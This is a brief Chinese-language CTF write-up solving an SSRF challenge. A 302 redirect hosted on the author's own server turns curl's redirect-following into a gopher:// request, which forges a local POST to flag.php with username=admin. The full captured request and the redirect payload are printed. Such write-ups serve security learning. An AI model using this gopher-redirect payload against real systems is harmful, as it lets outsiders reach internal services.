SSRF CTF 例題

 

 

一道ctf題目，有兩個文件：ssrf3.php和flag.php

題目意思是flag只能127.0.0.1訪問，還進行了post驗證，這就需要gopher提交post數據來繞過

curl設置了302跳轉，所以可以把302.php放在自己的vps上進行跳轉

首先獲取訪問flag.php的post請求：

    POST /flag.php HTTP/1.1

    Host: 192.168.154.130

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate

    Connection: keep-alive

    Upgrade-Insecure-Requests: 1

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 14

    username=admin

因為只有一台機器，所以我直接將Host改成了127.0.0.1,再改成符合gopher協議的請求，寫入302.php。

 302.php內容為：

header("Location:gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1%0d%0aHost:

127.0.0.1%0d%0aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0)

Gecko/20100101 Firefox/50.0%0d%0aAccept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8%0d%0aAccept-Language:

zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%0d%0aAccept-Encoding: gzip,

deflate%0d%0aConnection: keep-alive%0d%0aUpgrade-Insecure-Requests: 1%0d%0aContent-

Type: application/x-www-form-urlencoded%0d%0aContent-Length:

14%0d%0a%0d%0ausername=admin");

流程就是在ssrf3.php提交http://www.myvpsip.xip.io/302.php,然后漏洞機器會訪問302.php，然后跳轉，利用gopher協議，自己訪問自己的flag.php同時提交username=admin的post數據。flag可以在ssrf3.php的頁面源代碼中看到。